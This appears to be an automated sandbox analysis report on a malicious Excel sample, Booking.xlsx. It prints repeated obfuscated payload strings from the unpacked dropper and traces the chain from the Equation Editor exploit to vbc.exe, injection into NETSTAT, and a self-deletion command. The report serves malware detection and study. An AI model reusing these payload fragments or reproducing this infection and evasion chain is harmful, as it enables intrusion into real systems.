Source: 5.0.vbc.exe.cf0000.0.unpack, frmRazor.cs Base64 encoded string: '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
Source: 5.2.vbc.exe.cf0000.0.unpack, frmRazor.cs Base64 encoded string: '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
Source: 6.0.vbc.exe.cf0000.0.unpack, frmRazor.cs Base64 encoded string: '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
Source: 6.2.vbc.exe.cf0000.4.unpack, frmRazor.cs Base64 encoded string: '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
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@11/8@6/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Booking.xlsx Jump to behavior
Source: C:\Users\Public\vbc.exe Mutant created: \Sessions\1\BaseNamedObjects\vkakGWsQh
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRA2D.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2181434763.0000000002301000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: Booking.xlsx ReversingLabs: Detection: 23%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Booking.xlsx Static file information: File size 2512384 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: netstat.pdb source: vbc.exe, 00000006.00000002.2218174024.0000000000859000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, NETSTAT.EXE
Source: Booking.xlsx Initial sample: OLE indicators vbamacros = False
Source: Booking.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: svchost[1].2.dr, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.vbc.exe.cf0000.2.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.vbc.exe.cf0000.0.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.vbc.exe.cf0000.0.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.vbc.exe.cf0000.0.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.vbc.exe.cf0000.0.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.vbc.exe.cf0000.4.unpack, BoundHandle.cs .Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_003BA0DC push edi; iretd 4_2_003BA0DF
Source: C:\Users\Public\vbc.exe Code function: 6_2_00417867 push edx; retf 6_2_00417869
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041B124 push 423E369Ah; iretd 6_2_0041B12B
Source: C:\Users\Public\vbc.exe Code function: 6_2_00416625 push ds; retf 6_2_00416626
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CEB5 push eax; ret 6_2_0041CF08
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CF6C push eax; ret 6_2_0041CF72
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041DF6E push ds; ret 6_2_0041DF77
Source: C:\Users\Public\vbc.exe Code function: 6_2_0041CF02 push eax; ret 6_2_0041CF08
